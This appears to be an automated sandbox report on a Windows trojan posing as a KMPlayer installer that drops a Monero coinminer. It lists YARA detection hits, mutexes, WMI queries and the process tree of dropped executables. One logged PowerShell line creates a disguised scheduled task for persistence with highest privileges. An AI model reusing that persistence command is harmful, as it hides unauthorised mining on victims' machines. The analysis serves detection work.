                          Source: C:\Windows\sysnldcvmr.exeCode function: 5_2_0040EE745_2_0040EE74
                          Source: C:\Windows\sysnldcvmr.exeCode function: 5_2_004040905_2_00404090
                          Source: C:\Windows\sysnldcvmr.exeCode function: 5_2_00407B495_2_00407B49
                          Source: C:\Windows\sysnldcvmr.exeCode function: 5_2_004049705_2_00404970
                          Source: C:\Windows\sysnldcvmr.exeCode function: 5_2_0040A5005_2_0040A500
                          Source: C:\Windows\sysnldcvmr.exeCode function: 5_2_00407B205_2_00407B20
                          Source: C:\Windows\sysnldcvmr.exeCode function: 7_2_0040EE747_2_0040EE74
                          Source: C:\Windows\sysnldcvmr.exeCode function: 7_2_004040907_2_00404090
                          Source: C:\Windows\sysnldcvmr.exeCode function: 7_2_00407B497_2_00407B49
                          Source: C:\Windows\sysnldcvmr.exeCode function: 7_2_004049707_2_00404970
                          Source: C:\Windows\sysnldcvmr.exeCode function: 7_2_0040A5007_2_0040A500
                          Source: C:\Windows\sysnldcvmr.exeCode function: 7_2_00407B207_2_00407B20
                          Source: C:\Users\user\AppData\Local\Temp\2779421088.exeCode function: 9_2_00F781D29_2_00F781D2
                          Source: C:\Users\user\AppData\Local\Temp\2779421088.exeCode function: 9_2_00F6C2319_2_00F6C231
                          Source: C:\Users\user\AppData\Local\Temp\2779421088.exeCode function: 9_2_00F6C4009_2_00F6C400
                          Source: C:\Windows\System32\fontdrvhost.exeCode function: 12_2_00000270F6670C7012_2_00000270F6670C70
                          Source: C:\Users\user\AppData\Local\Temp\2910625892.exeCode function: 24_2_009E306B24_2_009E306B
                          Source: C:\Users\user\AppData\Local\Temp\2910625892.exeCode function: 24_2_009E391424_2_009E3914
                          Source: C:\Users\user\AppData\Local\Temp\2910625892.exeCode function: 24_2_009E3D2024_2_009E3D20
                          Source: C:\Users\user\AppData\Local\Temp\2910625892.exeCode function: 24_2_009E354024_2_009E3540
                          Source: C:\Users\user\AppData\Local\Temp\2910625892.exeCode function: 24_2_009E414024_2_009E4140
                          Source: C:\Users\user\AppData\Local\Temp\2910625892.exeCode function: 24_2_009E9D6924_2_009E9D69
                          Source: C:\Users\user\AppData\Local\Temp\2910625892.exeCode function: 24_2_009E46F024_2_009E46F0
                          Source: C:\Windows\System32\conhost.exeCode function: 32_2_00007FF6CE2085C032_2_00007FF6CE2085C0
                          Source: C:\Windows\System32\conhost.exeCode function: 32_2_00007FF6CE206D8032_2_00007FF6CE206D80
                          Source: C:\Windows\System32\conhost.exeCode function: 32_2_00007FF6CE1F719032_2_00007FF6CE1F7190
                          Source: C:\Windows\System32\conhost.exeCode function: 32_2_00007FF6CE203DE032_2_00007FF6CE203DE0
                          Source: C:\Windows\System32\conhost.exeCode function: String function: 00007FF6CE1F3F40 appears 34 times
                          Source: C:\Users\user\AppData\Local\Temp\2779421088.exeCode function: String function: 00F6CD90 appears 33 times
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 456 -p 5444 -ip 5444
                          Source: 2688734187.exe.11.drStatic PE information: Number of sections : 11 > 10
                          Source: winupsecvmgr.exe.18.drStatic PE information: Number of sections : 11 > 10
                          Source: nxmr[1].exe.11.drStatic PE information: Number of sections : 11 > 10
                          Source: f5TWdT5EAc.exe, 00000000.00000000.1311814537.0000000004A2F000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameKMPlayer_4.2.2.13.exe< vs f5TWdT5EAc.exe
                          Source: f5TWdT5EAc.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: 29.2.winupsecvmgr.exe.7ff731cd0000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                          Source: 29.2.winupsecvmgr.exe.7ff731cd0000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                          Source: 29.2.winupsecvmgr.exe.7ff731cd0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                          Source: 47.2.winupsecvmgr.exe.7ff7a1f2ca40.2.raw.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                          Source: 47.2.winupsecvmgr.exe.7ff7a1f2ca40.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                          Source: 47.2.winupsecvmgr.exe.7ff7a1f2ca40.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                          Source: 47.2.winupsecvmgr.exe.7ff7a1ef0000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                          Source: 47.2.winupsecvmgr.exe.7ff7a1ef0000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                          Source: 47.2.winupsecvmgr.exe.7ff7a1ef0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                          Source: 47.2.winupsecvmgr.exe.7ff7a1f30320.1.raw.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                          Source: 47.2.winupsecvmgr.exe.7ff7a1f30320.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                          Source: 47.2.winupsecvmgr.exe.7ff7a1f30320.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                          Source: 29.2.winupsecvmgr.exe.7ff731d10320.2.raw.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                          Source: 29.2.winupsecvmgr.exe.7ff731d10320.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                          Source: 29.2.winupsecvmgr.exe.7ff731d10320.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                          Source: 29.2.winupsecvmgr.exe.7ff731d0ca40.1.raw.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                          Source: 29.2.winupsecvmgr.exe.7ff731d0ca40.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                          Source: 29.2.winupsecvmgr.exe.7ff731d0ca40.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                          Source: 29.2.winupsecvmgr.exe.7ff731d10320.2.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                          Source: 29.2.winupsecvmgr.exe.7ff731d10320.2.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                          Source: 29.2.winupsecvmgr.exe.7ff731d10320.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                          Source: 47.2.winupsecvmgr.exe.7ff7a1f30320.1.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                          Source: 47.2.winupsecvmgr.exe.7ff7a1f30320.1.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                          Source: 47.2.winupsecvmgr.exe.7ff7a1f30320.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                          Source: 0000002F.00000002.3552448433.00007FF7A1F0B000.00000004.00000001.01000000.00000015.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                          Source: 0000001D.00000002.2779057358.00007FF731CEB000.00000004.00000001.01000000.00000015.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                          Source: C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmp, type: DROPPEDMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                          Source: C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmp, type: DROPPEDMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                          Source: C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmp, type: DROPPEDMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                          Source: 2779421088.exe, 00000009.00000000.1591959600.0000000000F89000.00000002.00000001.01000000.0000000B.sdmp, 2779421088.exe, 00000009.00000002.1607441159.0000000000F89000.00000002.00000001.01000000.0000000B.sdmpBinary or memory string: .a_po^ ojYd.o B U.R G v.Q_F& ZNH K.9.sV`OQ qOq_A( N5.j P.X z.k.Yf_HL.P.L`.C Ue_q_B_t.h{_yr\=A f.3_q_Fvb_H_bm W.UP#.by_iY.Yw I.Y_G p.3c g.Zy S v.U.N C_m Z_i.H_j B l_DH_Pd.iz_O.f~ U z_Mv_d7 T Mz.f.594/}_m kS.v.D u.rZu.S G.N_x.V J.Q.G FO^.X<.6_fv.V ny.L,_E.2.m I_l.b$ Mx sZ.K! p.Y.U.V:U.89 R_H F3.d_R A UQ.C_y y Y Jb.Q_S.N.s< l_Ab~[_w9zV?!C9.N_HQ)*_n R.tP Ww_u aU;.V EPk Xr.Q0.y.A!]_b!7 g.R_pF.E_b o.o.q.o_E.T_rdfw.c}_ck.4.Y_w:_P.B(#`_xy_i.3_Y.A_N.q.6.YE_S_T.R H n.R_d_F.V.s_R68).I aL q.H b.W.Q!.r b_w c c$_va.X_v.tRm l.sln_D c! C.7_F m M_j6 zr.w F i}%_N.RB A7_wG_m.4_A#&.G mCx.Q_s N pTS.n.e C.4_v_C_Q.e J q7E V P.LP_Q.kTN_c.F.D gc.hT_s_Q1
                          Source: 2779421088.exe, 00000009.00000000.1591959600.0000000000F89000.00000002.00000001.01000000.0000000B.sdmp, 2779421088.exe, 00000009.00000002.1607441159.0000000000F89000.00000002.00000001.01000000.0000000B.sdmpBinary or memory string: .tRm l.sln_D c! C.7_F m M_j6 zr.w F i}%_N.RB A7_wG_m.4_A#&.G mCx.Q_s N pTS.n.e C.4_v_
                          Source: classification engineClassification label: mal100.troj.evad.mine.winEXE@66/62@3/81
                          Source: C:\Users\user\AppData\Local\Temp\896429707.exeCode function: 4_2_00406BC0 Sleep,GetModuleFileNameW,GetVolumeInformationW,GetDiskFreeSpaceExW,_aulldiv,wsprintfW,wsprintfW,wsprintfW,Sleep,ExitThread,4_2_00406BC0
                          Source: C:\Users\user\AppData\Local\Temp\896429707.exeCode function: 4_2_00406460 CoInitialize,CoCreateInstance,wsprintfW,4_2_00406460
                          Source: C:\Users\user\Desktop\f5TWdT5EAc.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\pei[1].exeJump to behavior
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7400:120:WilError_03
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                          Source: C:\Users\user\AppData\Local\Temp\640832494.exeMutant created: \Sessions\1\BaseNamedObjects\hh6657577447
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2656:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2096:120:WilError_03
                          Source: C:\Windows\SysWOW64\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-1f96af2f-fdf5-b0fa4a-ee59e54ff93d}
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7772:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6604:120:WilError_03
                          Source: C:\Windows\System32\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:2744:120:WilError_03
                          Source: C:\Windows\System32\dwm.exeMutant created: \Sessions\1\BaseNamedObjects\Global\vljmdnomkxppwbqz
                          Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5444
                          Source: C:\Windows\sysnldcvmr.exeMutant created: \Sessions\1\BaseNamedObjects\753f85d83d
                          Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1852
                          Source: C:\Users\user\Desktop\f5TWdT5EAc.exeFile created: C:\Users\user\AppData\Local\Temp\34D7.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\640832494.exeCommand line argument: hh665757744713_2_001D1F60
                          Source: C:\Windows\SysWOW64\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                          Source: C:\Windows\SysWOW64\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                          Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
                          Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                          Source: C:\Users\user\Desktop\f5TWdT5EAc.exeFile read: C:\Users\desktop.iniJump to behavior
                          Source: C:\Users\user\Desktop\f5TWdT5EAc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: f5TWdT5EAc.exeReversingLabs: Detection: 60%
                          Source: C:\Users\user\Desktop\f5TWdT5EAc.exeFile read: C:\Users\user\Desktop\f5TWdT5EAc.exeJump to behavior
                          Source: unknownProcess created: C:\Users\user\Desktop\f5TWdT5EAc.exe "C:\Users\user\Desktop\f5TWdT5EAc.exe"
                          Source: C:\Users\user\Desktop\f5TWdT5EAc.exeProcess created: C:\Users\user\AppData\Local\Temp\34D7.exe "C:\Users\user\AppData\Local\Temp\34D7.exe"
                          Source: C:\Users\user\AppData\Local\Temp\34D7.exeProcess created: C:\Users\user\AppData\Local\Temp\896429707.exe C:\Users\user\AppData\Local\Temp\896429707.exe
                          Source: C:\Users\user\AppData\Local\Temp\896429707.exeProcess created: C:\Windows\sysnldcvmr.exe C:\Windows\sysnldcvmr.exe
                          Source: unknownProcess created: C:\Windows\sysnldcvmr.exe "C:\Windows\sysnldcvmr.exe"
                          Source: C:\Windows\sysnldcvmr.exeProcess created: C:\Users\user\AppData\Local\Temp\1171111125.exe C:\Users\user\AppData\Local\Temp\1171111125.exe
                          Source: C:\Users\user\AppData\Local\Temp\1171111125.exeProcess created: C:\Users\user\AppData\Local\Temp\2779421088.exe C:\Users\user\AppData\Local\Temp\2779421088.exe
                          Source: C:\Users\user\AppData\Local\Temp\2779421088.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"
                          Source: C:\Windows\sysnldcvmr.exeProcess created: C:\Users\user\AppData\Local\Temp\78476062.exe C:\Users\user\AppData\Local\Temp\78476062.exe
                          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\System32\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
                          Source: C:\Windows\sysnldcvmr.exeProcess created: C:\Users\user\AppData\Local\Temp\640832494.exe C:\Users\user\AppData\Local\Temp\640832494.exe
                          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 456 -p 5444 -ip 5444
                          Source: C:\Windows\System32\fontdrvhost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5444 -s 136
                          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                          Source: C:\Users\user\AppData\Local\Temp\78476062.exeProcess created: C:\Users\user\AppData\Local\Temp\2688734187.exe C:\Users\user\AppData\Local\Temp\2688734187.exe
                          Source: C:\Windows\sysnldcvmr.exeProcess created: C:\Users\user\AppData\Local\Temp\1657630034.exe C:\Users\user\AppData\Local\Temp\1657630034.exe
                          Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\sysnldcvmr.exeProcess created: C:\Users\user\AppData\Local\Temp\2910625892.exe C:\Users\user\AppData\Local\Temp\2910625892.exe
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 1852 -ip 1852
                          Source: C:\Users\user\AppData\Local\Temp\2910625892.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1852 -s 1332
                          Source: unknownProcess created: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe "C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe"
